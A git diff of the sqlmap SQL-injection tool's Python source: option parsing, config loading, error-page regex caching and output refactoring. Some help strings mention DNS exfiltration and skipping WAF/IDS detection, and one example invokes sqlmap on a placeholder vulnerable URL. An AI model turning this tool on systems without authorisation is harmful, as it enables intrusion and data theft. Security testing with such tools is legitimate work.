self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME) - if (not(registriesElem)): - registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME) - self._addToRoot(registriesElem) - registriesElem.appendChild(registerElem) - - def rFile(self, filePath, data): - ''' - Adds an extracted file's content to the xml - ''' - fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME) - fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath)) - fileContentElem.appendChild(self._createTextNode(data)) - self._addToRoot(fileContentElem) - - def setOutputFile(self): - ''' - Initiates the xml file from the configuration. 
- ''' - if (conf.xmlFile): - try: - self._outputFile = conf.xmlFile - self.__root = None - - if os.path.exists(self._outputFile): - try: - self.__doc = xml.dom.minidom.parse(self._outputFile) - self.__root = self.__doc.childNodes[0] - except ExpatError: - self.__doc = Document() - - self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING) - - if self.__root is None: - self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME) - self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR)) - self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME)) - self.__doc.appendChild(self.__root) - except IOError: - raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile) - - def getOutputFile(self): - return self._outputFile - - def finish(self, resultStatus, resultMsg=""): - ''' - Finishes the dumper operation: - 1. Adds the session status to the xml - 2. Writes the xml to the file - 3. Closes the xml file - ''' - if ((self._outputFP is not None) and not(self._outputFP.closed)): - statusElem = self.__doc.createElement(STATUS_ELEM_NAME) - statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus))) - - if not resultStatus: - errorElem = self.__doc.createElement(ERROR_ELEM_NAME) - - if isinstance(resultMsg, Exception): - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__)) - else: - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE)) - - errorElem.appendChild(self._createTextNode(getUnicode(resultMsg))) - statusElem.appendChild(errorElem) - - self._addToRoot(statusElem) - self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING)) - self._outputFP.close() - - -def closeDumper(status, msg=""): - """ - Closes the dumper of the session - """ - - if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"): - conf.dumper.finish(status, msg) - -dumper = XMLDump() diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/parse/__init__.py +++ b/lib/parse/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/banner.py b/lib/parse/banner.py index c83c42aa0..bc617084d 100644 --- a/lib/parse/banner.py +++ b/lib/parse/banner.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 154c5d7e3..218f80fd2 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -17,6 +17,7 @@ from optparse import SUPPRESS_HELP from lib.core.common import checkDeprecatedOptions from lib.core.common import checkSystemEncoding +from lib.core.common import dataToStdout from lib.core.common import expandMnemonics from lib.core.common import getUnicode from lib.core.data import cmdLineOptions @@ -30,20 +31,25 @@ from lib.core.settings import BASIC_HELP_ITEMS from lib.core.settings import DUMMY_URL from 
lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import VERSION_STRING from lib.core.shell import autoCompletion from lib.core.shell import clearHistory from lib.core.shell import loadHistory from lib.core.shell import saveHistory -def cmdLineParser(): +def cmdLineParser(argv=None): """ This function parses the command line parameters and arguments """ + if not argv: + argv = sys.argv + checkSystemEncoding() - _ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding()) + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ "\"%s\"" % _ if " " in _ else _) @@ -141,12 +147,21 @@ def cmdLineParser(): help="HTTP authentication credentials " "(name:password)") - request.add_option("--auth-private", dest="authPrivate", - help="HTTP authentication PEM private key file") + request.add_option("--auth-file", dest="authFile", + help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-401", dest="ignore401", action="store_true", help="Ignore HTTP Error 401 (Unauthorized)") + request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", + help="Ignore system default proxy settings") + + request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true", + help="Ignore redirection attempts") + + request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", + help="Ignore connection timeouts") + request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL") @@ -157,9 +172,6 @@ def cmdLineParser(): request.add_option("--proxy-file", dest="proxyFile", help="Load proxy list from a file") - request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", - help="Ignore system default proxy settings") - request.add_option("--tor", dest="tor", action="store_true", help="Use Tor anonymity network") @@ -168,7 +180,7 @@ def cmdLineParser(): help="Set Tor proxy port other than default") request.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)") + help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") request.add_option("--check-tor", dest="checkTor", action="store_true", @@ -256,7 +268,10 @@ def cmdLineParser(): help="Skip testing for given parameter(s)") injection.add_option("--skip-static", dest="skipStatic", action="store_true", - help="Skip testing parameters that not appear dynamic") + help="Skip testing parameters that not appear to be dynamic") + + injection.add_option("--param-exclude", dest="paramExclude", + help="Regexp to exclude parameters from testing (e.g. 
\"ses\")") injection.add_option("--dbms", dest="dbms", help="Force back-end DBMS to this value") @@ -356,7 +371,7 @@ def cmdLineParser(): techniques.add_option("--union-from", dest="uFrom", help="Table to use in FROM part of UNION query SQL injection") - techniques.add_option("--dns-domain", dest="dnsName", + techniques.add_option("--dns-domain", dest="dnsDomain", help="Domain name used for DNS exfiltration attack") techniques.add_option("--second-order", dest="secondOrder", @@ -461,14 +476,17 @@ def cmdLineParser(): help="Exclude DBMS system databases when " "enumerating tables") + enumeration.add_option("--pivot-column", dest="pivotColumn", + help="Pivot column name") + enumeration.add_option("--where", dest="dumpWhere", help="Use WHERE condition while table dumping") enumeration.add_option("--start", dest="limitStart", type="int", - help="First query output entry to retrieve") + help="First dump table entry to retrieve") enumeration.add_option("--stop", dest="limitStop", type="int", - help="Last query output entry to retrieve") + help="Last dump table entry to retrieve") enumeration.add_option("--first", dest="firstChar", type="int", help="First query output word character to retrieve") @@ -600,9 +618,6 @@ def cmdLineParser(): general = OptionGroup(parser, "General", "These options can be used " "to set some general working parameters") - #general.add_option("-x", dest="xmlFile", - # help="Dump the data into an XML file") - general.add_option("-s", dest="sessionFile", help="Load session from a stored (.sqlite) file") @@ -614,9 +629,16 @@ def cmdLineParser(): action="store_true", help="Never ask for user input, use the default behaviour") + general.add_option("--binary-fields", dest="binaryFields", + help="Result fields having binary values (e.g. \"digest\")") + general.add_option("--charset", dest="charset", help="Force character encoding used for data retrieval") + general.add_option("--check-internet", dest="checkInternet", + action="store_true", + help="Check Internet connection before assessing the target") + general.add_option("--crawl", dest="crawlDepth", type="int", help="Crawl the website starting from the target URL") @@ -632,8 +654,7 @@ def cmdLineParser(): general.add_option("--eta", dest="eta", action="store_true", - help="Display for each output the " - "estimated time of arrival") + help="Display for each output the estimated time of arrival") general.add_option("--flush-session", dest="flushSession", action="store_true", @@ -647,6 +668,9 @@ def cmdLineParser(): action="store_true", help="Ignore query results stored in session file") + general.add_option("--har", dest="harFile", + help="Log all HTTP traffic into a HAR file") + general.add_option("--hex", dest="hexConvert", action="store_true", help="Use DBMS hex function(s) for data retrieval") @@ -659,11 +683,7 @@ def cmdLineParser(): action="store_true", help="Parse and display DBMS error messages from responses") - general.add_option("--pivot-column", dest="pivotColumn", - help="Pivot column name") - - general.add_option("--save", dest="saveCmdline", - action="store_true", + general.add_option("--save", dest="saveConfig", help="Save options to a configuration INI file") general.add_option("--scope", dest="scope", @@ -672,6 +692,9 @@ def cmdLineParser(): general.add_option("--test-filter", dest="testFilter", help="Select tests by payloads and/or titles (e.g. ROW)") + general.add_option("--test-skip", dest="testSkip", + help="Skip tests by payloads and/or titles (e.g. 
BENCHMARK)") + general.add_option("--update", dest="updateAll", action="store_true", help="Update sqlmap") @@ -719,20 +742,26 @@ def cmdLineParser(): action="store_true", help="Work in offline mode (only use session data)") - miscellaneous.add_option("--page-rank", dest="pageRank", - action="store_true", - help="Display page rank (PR) for Google dork results") - miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", help="Safely remove all content from output directory") + miscellaneous.add_option("--skip-waf", dest="skipWaf", + action="store_true", + help="Skip heuristic detection of WAF/IPS/IDS protection") + miscellaneous.add_option("--smart", dest="smart", action="store_true", help="Conduct thorough tests only if positive heuristic(s)") miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", - help="Prompt for an interactive sqlmap shell") + help="Prompt for an interactive sqlmap shell") + + miscellaneous.add_option("--tmp-dir", dest="tmpDir", + help="Local directory for storing temporary files") + + miscellaneous.add_option("--web-root", dest="webRoot", + help="Web server document root directory (e.g. \"/var/www\")") miscellaneous.add_option("--wizard", dest="wizard", action="store_true", @@ -742,21 +771,24 @@ def cmdLineParser(): parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP) - parser.add_option("--pickled-options", dest="pickledOptions", + parser.add_option("--murphy-rate", dest="murphyRate", type="int", + help=SUPPRESS_HELP) + + parser.add_option("--disable-precon", dest="disablePrecon", action="store_true", + help=SUPPRESS_HELP) + + parser.add_option("--disable-stats", dest="disableStats", action="store_true", help=SUPPRESS_HELP) parser.add_option("--profile", dest="profile", action="store_true", help=SUPPRESS_HELP) - parser.add_option("--binary-fields", dest="binaryFields", - help=SUPPRESS_HELP) - - parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", - help=SUPPRESS_HELP) - parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP) + parser.add_option("--force-threads", dest="forceThreads", action="store_true", + help=SUPPRESS_HELP) + parser.add_option("--smoke-test", dest="smokeTest", action="store_true", help=SUPPRESS_HELP) @@ -768,6 +800,14 @@ def cmdLineParser(): parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) + # API options + parser.add_option("--api", dest="api", action="store_true", + help=SUPPRESS_HELP) + + parser.add_option("--taskid", dest="taskid", help=SUPPRESS_HELP) + + parser.add_option("--database", dest="database", help=SUPPRESS_HELP) + parser.add_option_group(target) parser.add_option_group(request) parser.add_option_group(optimization) @@ -786,31 +826,33 @@ def cmdLineParser(): # Dirty hack to display longer options without breaking into two lines def _(self, *args): - _ = parser.formatter._format_option_strings(*args) - if len(_) > MAX_HELP_OPTION_LENGTH: - _ = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % _ - return _ + retVal = parser.formatter._format_option_strings(*args) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." 
% (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal + return retVal parser.formatter._format_option_strings = parser.formatter.format_option_strings parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser)) - # Dirty hack for making a short option -hh + # Dirty hack for making a short option '-hh' option = parser.get_option("--hh") option._short_opts = ["-hh"] option._long_opts = [] - # Dirty hack for inherent help message of switch -h + # Dirty hack for inherent help message of switch '-h' option = parser.get_option("-h") option.help = option.help.capitalize().replace("this help", "basic help") - argv = [] + _ = [] prompt = False advancedHelp = True extraHeaders = [] - for arg in sys.argv: - argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + for arg in argv: + _.append(getUnicode(arg, encoding=sys.stdin.encoding)) + argv = _ checkDeprecatedOptions(argv) prompt = "--sqlmap-shell" in argv @@ -845,14 +887,14 @@ def cmdLineParser(): if not command: continue elif command.lower() == "clear": - clearHistory() - print "[i] history cleared" + clearHistory() + dataToStdout("[i] history cleared\n") saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) elif command.lower() in ("x", "q", "exit", "quit"): raise SqlmapShellQuitException elif command[0] != '-': - print "[!] invalid option(s) provided" - print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'" + dataToStdout("[!] invalid option(s) provided\n") + dataToStdout("[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'\n") else: saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) @@ -864,10 +906,18 @@ def cmdLineParser(): except ValueError, ex: raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message - # Hide non-basic options in basic help case for i in xrange(len(argv)): if argv[i] == "-hh": argv[i] = "-h" + elif len(argv[i]) > 1 and all(ord(_) in xrange(0x2018, 0x2020) for _ in ((argv[i].split('=', 1)[-1].strip() or ' ')[0], argv[i][-1])): + dataToStdout("[!] copy-pasting illegal (non-console) quote characters from Internet is, well, illegal (%s)\n" % argv[i]) + raise SystemExit + elif len(argv[i]) > 1 and u"\uff0c" in argv[i].split('=', 1)[-1]: + dataToStdout("[!] copy-pasting illegal (non-console) comma characters from Internet is, well, illegal (%s)\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w=.+", argv[i]): + dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) + raise SystemExit elif argv[i] == "-H": if i + 1 < len(argv): extraHeaders.append(argv[i + 1]) @@ -877,7 +927,7 @@ def cmdLineParser(): elif argv[i] == "--version": print VERSION_STRING.split('/')[-1] raise SystemExit - elif argv[i] == "-h": + elif argv[i] in ("-h", "--help"): advancedHelp = False for group in parser.option_groups[:]: found = False @@ -889,14 +939,22 @@ def cmdLineParser(): if not found: parser.option_groups.remove(group) + for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)): + try: + if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit(): + conf.verbose = verbosity.count('v') + 1 + del argv[argv.index(verbosity)] + except (IndexError, ValueError): + pass + try: (args, _) = parser.parse_args(argv) except UnicodeEncodeError, ex: - print "\n[!] 
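One easy-to-miss addition above is the pre-pass over argv that collapses a bare repeated switch such as -vv into a numeric verbosity level before optparse sees it (the real code also leaves the switch alone when it is followed by an explicit number). A simplified sketch:

    import re

    def extract_verbosity(argv):
        """Strip bare -v/-vv/-vvv switches and return the implied verbosity level."""
        verbose = None
        for arg in list(argv):
            if re.search(r"\A-v+\Z", arg):
                verbose = arg.count('v') + 1   # mirrors "verbosity.count('v') + 1" above
                argv.remove(arg)
        return verbose, argv

    # extract_verbosity(["-u", "http://www.site.com/vuln.php?id=1", "-vv"]) -> (3, ["-u", "http://www.site.com/vuln.php?id=1"])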
%s" % ex.object.encode("unicode-escape") + dataToStdout("\n[!] %s\n" % ex.object.encode("unicode-escape")) raise SystemExit except SystemExit: if "-h" in argv and not advancedHelp: - print "\n[!] to see full list of options run with '-hh'" + dataToStdout("\n[!] to see full list of options run with '-hh'\n") raise if extraHeaders: @@ -915,9 +973,9 @@ def cmdLineParser(): if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.pickledOptions, args.sitemapUrl)): + args.purgeOutput, args.sitemapUrl)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help" + errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) return args @@ -928,7 +986,7 @@ def cmdLineParser(): except SystemExit: # Protection against Windows dummy double clicking if IS_WIN: - print "\nPress Enter to continue...", + dataToStdout("\nPress Enter to continue...") raw_input() raise diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index 507cce17b..7f522a999 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -1,30 +1,27 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -import codecs - -from ConfigParser import MissingSectionHeaderError -from ConfigParser import ParsingError - from lib.core.common import checkFile +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import openFile from lib.core.common import unArrayizeValue from lib.core.common import UnicodeRawConfigParser +from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import logger +from lib.core.enums import OPTION_TYPE from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapSyntaxException from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING config = None -def configFileProxy(section, option, boolean=False, integer=False): +def configFileProxy(section, option, datatype): """ Parse configuration file and save settings into the configuration advanced dictionary. 
@@ -34,10 +31,12 @@ def configFileProxy(section, option, boolean=False, integer=False): if config.has_option(section, option): try: - if boolean: + if datatype == OPTION_TYPE.BOOLEAN: value = config.getboolean(section, option) if config.get(section, option) else False - elif integer: + elif datatype == OPTION_TYPE.INTEGER: value = config.getint(section, option) if config.get(section, option) else 0 + elif datatype == OPTION_TYPE.FLOAT: + value = config.getfloat(section, option) if config.get(section, option) else 0.0 else: value = config.get(section, option) except ValueError, ex: @@ -73,23 +72,21 @@ def configFileParser(configFile): config = UnicodeRawConfigParser() config.readfp(configFP) except Exception, ex: - errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message + errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) raise SqlmapSyntaxException(errMsg) if not config.has_section("Target"): errMsg = "missing a mandatory section 'Target' in the configuration file" raise SqlmapMissingMandatoryOptionException(errMsg) - condition = not config.has_option("Target", "direct") - condition &= not config.has_option("Target", "url") - condition &= not config.has_option("Target", "logFile") - condition &= not config.has_option("Target", "bulkFile") - condition &= not config.has_option("Target", "googleDork") - condition &= not config.has_option("Target", "requestFile") - condition &= not config.has_option("Target", "sitemapUrl") - condition &= not config.has_option("Target", "wizard") + mandatory = False - if condition: + for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "sitemapUrl", "wizard"): + if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option): + mandatory = True + break + + if not mandatory: errMsg = "missing a mandatory option in the configuration file " errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -97,8 +94,4 @@ def configFileParser(configFile): for family, optionData in optDict.items(): for option, datatype in optionData.items(): datatype = unArrayizeValue(datatype) - - boolean = datatype == "boolean" - integer = datatype == "integer" - - configFileProxy(family, option, boolean, integer) + configFileProxy(family, option, datatype) diff --git a/lib/parse/handler.py b/lib/parse/handler.py index 04950ecbd..664da4233 100644 --- a/lib/parse/handler.py +++ b/lib/parse/handler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 4ca97779c..8e073ce4a 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/html.py b/lib/parse/html.py index 3c40920e6..f0ee8fcd5 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,7 
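configFileProxy() now receives the option's declared datatype instead of separate boolean/integer flags, which is what lets the new FLOAT branch slot in without touching every call site. The lookup boils down to something like the following (datatype names and the sample section/option are illustrative):

    from ConfigParser import RawConfigParser   # Python 2 module name, as used by sqlmap

    def read_option(config, section, option, datatype):
        """Fetch a single option, coerced according to its declared datatype."""
        if not config.has_option(section, option):
            return None
        raw = config.get(section, option)
        if datatype == "boolean":
            return config.getboolean(section, option) if raw else False
        if datatype == "integer":
            return config.getint(section, option) if raw else 0
        if datatype == "float":
            return config.getfloat(section, option) if raw else 0.0
        return raw

    config = RawConfigParser()
    config.read("sqlmap.conf")
    print(read_option(config, "Request", "timeout", "float"))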
+24,8 @@ class HTMLHandler(ContentHandler): ContentHandler.__init__(self) self._dbms = None - self._page = page + self._page = (page or "") + self._lower_page = self._page.lower() self.dbms = None @@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler): threadData.lastErrorPage = (threadData.lastRequestUID, self._page) def startElement(self, name, attrs): + if self.dbms: + return + if name == "dbms": self._dbms = attrs.get("value") elif name == "error": - if re.search(attrs.get("regexp"), self._page, re.I): + regexp = attrs.get("regexp") + if regexp not in kb.cache.regex: + keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp)) + keywords = sorted(keywords, key=len) + kb.cache.regex[regexp] = keywords[-1].lower() + + if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I): self.dbms = self._dbms self._markAsErrorPage() @@ -49,6 +59,13 @@ def htmlParser(page): xmlfile = paths.ERRORS_XML handler = HTMLHandler(page) + key = hash(page) + + if key in kb.cache.parsedDbms: + retVal = kb.cache.parsedDbms[key] + if retVal: + handler._markAsErrorPage() + return retVal parseXmlFile(xmlfile, handler) @@ -58,6 +75,8 @@ def htmlParser(page): else: kb.lastParserStatus = None + kb.cache.parsedDbms[key] = handler.dbms + # generic SQL warning/error messages if re.search(r"SQL (warning|error|syntax)", page, re.I): handler._markAsErrorPage() diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index a96867082..c17f41997 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,23 +9,25 @@ import os from xml.etree import ElementTree as et +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import paths from lib.core.datatype import AttribDict from lib.core.exception import SqlmapInstallationException +from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): if tag in ("clause", "where"): text = text.split(',') if isinstance(text, basestring): - text = int(text) if text.isdigit() else str(text) + text = int(text) if text.isdigit() else text elif isinstance(text, list): count = 0 for _ in text: - text[count] = int(_) if _.isdigit() else str(_) + text[count] = int(_) if _.isdigit() else _ count += 1 if len(text) == 1 and tag not in ("clause", "where"): @@ -73,8 +75,8 @@ def loadBoundaries(): try: doc = et.parse(paths.BOUNDARIES_XML) except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg @@ -82,17 +84,14 @@ def loadBoundaries(): parseXmlNode(root) def loadPayloads(): - payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH) - payloadFiles.sort() - - for payloadFile in payloadFiles: + for payloadFile in PAYLOAD_XML_FILES: payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile) try: doc = et.parse(payloadFilePath) except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). 
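The startElement() change above is a throughput optimisation for error-based fingerprinting: the longest literal keyword of each error regexp is extracted once and cached, and a cheap substring test against the lowercased page decides whether the full re.search() is worth running at all; the per-page kb.cache.parsedDbms entry then spares re-parsing identical pages. Stripped of sqlmap's plumbing:

    import re

    _keyword_cache = {}

    def error_regexp_matches(regexp, page):
        """Cheap keyword gate in front of a potentially expensive regexp search."""
        if regexp not in _keyword_cache:
            keywords = sorted(re.findall(r"\w+", re.sub(r"\\.", " ", regexp)), key=len)
            _keyword_cache[regexp] = keywords[-1].lower() if keywords else ""
        return _keyword_cache[regexp] in page.lower() and re.search(regexp, page, re.I) is not None

    # error_regexp_matches(r"You have an error in your SQL syntax", "<b>You have an error in your SQL syntax</b>") -> True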
Please make " % (payloadFilePath, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py index 009a63450..efd609d15 100644 --- a/lib/parse/sitemap.py +++ b/lib/parse/sitemap.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -41,8 +41,7 @@ def parseSitemap(url, retVal=None): if url.endswith(".xml") and "sitemap" in url.lower(): if kb.followSitemapRecursion is None: message = "sitemap recursion detected. Do you want to follow? [y/N] " - test = readInput(message, default="N") - kb.followSitemapRecursion = test[0] in ("y", "Y") + kb.followSitemapRecursion = readInput(message, default='N', boolean=True) if kb.followSitemapRecursion: parseSitemap(url, retVal) else: diff --git a/lib/request/__init__.py b/lib/request/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/request/__init__.py +++ b/lib/request/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/basic.py b/lib/request/basic.py old mode 100755 new mode 100644 index 41829c0ce..9ca84f764 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -13,10 +13,12 @@ import StringIO import struct import zlib +from lib.core.common import Backend from lib.core.common import extractErrorMessage from lib.core.common import extractRegexResult from lib.core.common import getPublicTypeMembers from lib.core.common import getUnicode +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import singleTimeLogMessage @@ -24,6 +26,8 @@ from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.decorators import cachedmethod +from lib.core.enums import DBMS from lib.core.enums import HTTP_HEADER from lib.core.enums import PLACE from lib.core.exception import SqlmapCompressionException @@ -33,6 +37,8 @@ from lib.core.settings import EVENTVALIDATION_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import META_CHARSET_REGEX from lib.core.settings import PARSE_HEADERS_LIMIT +from lib.core.settings import SELECT_FROM_TABLE_REGEX +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import VIEWSTATE_REGEX from lib.parse.headers import headersParser from lib.parse.html import htmlParser @@ -89,19 +95,19 @@ def forgeHeaders(items=None): if cookie.domain_specified and not conf.hostname.endswith(cookie.domain): continue - if ("%s=" % cookie.name) in headers[HTTP_HEADER.COOKIE]: + if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]): if conf.loadCookies: conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders)) elif kb.mergeCookies is None: message = "you provided a HTTP %s header value. 
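Several call sites in this patch, the sitemap-recursion prompt above among them, stop post-processing the raw answer (test[0] in ("y", "Y")) and instead pass boolean=True to readInput(). The real helper lives in lib/core/common; a rough stand-in showing what the flag implies for callers:

    def read_input(message, default=None, boolean=False):
        """Illustrative stand-in for sqlmap's readInput(): prompt, fall back to the
        default on an empty answer and, if asked, normalise y/n to True/False."""
        answer = raw_input(message).strip() or (default or "")   # Python 2 builtin
        if boolean:
            return answer.lower().startswith('y')
        return answer

    # read_input("sitemap recursion detected. Do you want to follow? [y/N] ", default='N', boolean=True)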
